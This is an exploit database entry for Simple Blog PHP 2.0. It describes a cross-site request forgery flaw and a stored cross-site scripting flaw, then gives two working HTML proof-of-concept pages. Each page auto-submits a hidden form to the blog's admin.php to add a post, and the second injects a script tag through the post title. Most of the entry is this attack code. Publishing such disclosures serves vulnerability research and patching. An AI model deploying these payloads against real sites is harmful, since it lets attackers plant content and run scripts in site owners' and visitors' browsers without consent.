Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS

vendor:

Simple Blog PHP

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS)

352, 79

CWE

Product Name: Simple Blog PHP

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: NO

Related CWE: N/A

CPE: 2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2016

Simple Blog PHP 2.0 – CSRF(Add Post) // Stored XSS

A Cross-Site Request Forgery (CSRF) vulnerability exists in Simple Blog PHP 2.0, which allows an attacker to add a post with malicious content. An attacker can craft a malicious HTML page and send it to the victim, when the victim visits the page, the malicious post will be added to the blog. Additionally, a Stored Cross-Site Scripting (XSS) vulnerability exists in Simple Blog PHP 2.0, which allows an attacker to inject malicious JavaScript code into the blog post. An attacker can craft a malicious HTML page and send it to the victim, when the victim visits the page, the malicious JavaScript code will be stored in the blog post.

Mitigation:

The application should verify the request origin and validate all input data.

Source

Exploit-DB raw data:

=====================================================
# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS
=====================================================
# Vendor Homepage: http://simpleblogphp.com/
# Date: 13 Oct 2016
# Demo Link : http://simpleblogphp.com/blog/admin.php
# Version : 2.0
# Platform : PHP
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
=====================================================
# CSRF PoC(Add Post):
<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://localhost/blog/admin.php" method="POST">
      <input type="hidden" name="act" value="addPost" />
      <input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
      <input type="hidden" name="post_title" value="Hacked" />
      <input type="hidden" name="post_text" value="Hacked" />
      <input type="hidden" name="post_limit" value="550" />
	   <input type="submit" value="Submit request" />
    </form>
    <script>
		document.forms[0].submit();
    </script>
  </body>
</html>


# Stored XSS PoC:
<html>
  <!-- CSRF + XSS Stored PoC -->
  <body>
    <form action="http://localhost/blog/admin.php" method="POST">
      <input type="hidden" name="act" value="addPost" />
      <input type="hidden" name="publish_date" value="2016-10-13 10:30:27" />
      <input type="hidden" name="post_title" value="<script>alert('XssPoC')</script>" />
      <input type="hidden" name="post_text" value="Hacked" />
      <input type="hidden" name="post_limit" value="550" />
	   <input type="submit" value="Submit request" />
    </form>
    <script>
		document.forms[0].submit();
    </script>
  </body>
</html>
================================================================================
# Discovered By : Ehsan Hosseini
================================================================================